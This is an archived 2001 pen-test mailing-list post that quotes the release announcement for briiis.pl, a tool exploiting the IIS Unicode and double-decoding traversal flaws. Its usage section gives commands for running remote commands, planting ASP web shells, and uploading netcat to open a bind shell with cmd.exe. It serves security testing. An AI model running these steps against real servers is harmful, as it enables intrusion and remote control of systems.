It should be noted that this windows 2k (workstation server etc...) with SP2 is exploitable using the '/' decoding vulnerability. (Im sure this was noted at some point) It should also be noted that my test machines have all the latest patches applied from microsoft. Anyhow.. I would like to thank the people at ixsecurity (Ian Vitek) for this application as it proved a point to a co-worker for me. :> Cheers CR -----Original Message----- From: ian.vitekat_private [mailto:ian.vitekat_private] Sent: Wednesday, June 13, 2001 7:14 AM To: pen-testat_private Cc: Hackers Subject: iXsecurity.tool.briiis.3.02 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iXsecurity Security Tool Release briiis.pl v3.02 ================ Tool Description - - ------------ Briiis is a tool for testing web servers for "/" encoding break out from web root vulnerability from an executable directory. E.g. IIS Unicode and double encoding vulnerabilities. Special features - - ------------ * Tests a lot of commonly executable directories if any of these directories is on the same disk as C:\WINNT\SYSTEM32\CMD.EXE Very easy to add even more directories * Caches the found directory * SSL support with SSLeay (Unix) * Easy to use text file upload * Easy to use / encoding option * Relative path name program execution * Virtual host support When to use briiis - - -------------- Briiis should be used to test the IIS unicode or the IIS superfluous decoding vulnerability. Briiis can also be used to check for other "/" unicode or "/" decoding vulnerabilities where the goal is to break out from the web root from an executable directory to access CMD.EXE. How to use briiis - - ------------- Test a server for the unicode vulnerability with the command: briiis.pl -s server Test the decoding vulnerability: briiis.pl -s server -F %255c Copy CMD.EXE to the web executable directory (Used for running commands and uploading files) briiis.pl -s server -x Run commands briiis.pl -s server -C "dir /a" Upload an ASP script to the executable directory (Like cmdasp.asp and upload.asp) briiis.pl -s server -u upload.asp Other options - - --------- The virtual host option, -H, is used when multiple web servers are bound to same IP and PORT. One case is for example reverse proxying. The standard "-s www.server.dom" sets the "Host:" header to: Host: www.server.dom If other virtual servers needs to be tested run: briiis.pl -s www.server.dom -H www.server2.dom Briiis creates a cache file named "<program_name>.cache". Delete the cache file if you want to run a new test after patching the server. The binary file upload does not work due to lack of privileges. If you want to test it: * Copy NC.EXE or something to NC.BIN * briiis.pl -s server -U NC.BIN -d -l c:\ * There is now a NC.SCR, debug script, in c:\ * With cmdasp.asp run debug < nc.scr * Start NC.BIN with cmdasp.asp c:\nc.bin -l -p 7171 -n -v -e cmd.exe The binary upload function can only handle small files. Use upload.asp or TFTP when uploading larger files. Background and more information - - --------------------------- Unicode vulnerability information: http://www.microsoft.com/technet/security/bulletin/MS00-078.asp Superfluous Decoding Vulnerability information: http://www.microsoft.com/technet/security/bulletin/MS01-026.asp TODO - - * Graphical interface (Planned Q4 2002) * Basic Authentication (Planned Q3 2001) - - ------------------------------------------------ Ian Vitek, mailto:ian.vitekat_private - - ------------------------------------------------ iXsecurity (former Infosec) is a Swedish and United Kingdom based tigerteam that have worked with computer- related security since 1982 and done technical security audits (pentests) since 1995. iXsecurity welcomes all new co-workers in Sweden and United Kingdom. - - ------------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.1 iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV WnyLpKEcIdhaDfeNKALz2rNG =FhpF -----END PGP SIGNATURE----- Briiis.pl ========= (See attached file: briiis.pl)
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 22:30:49 PDT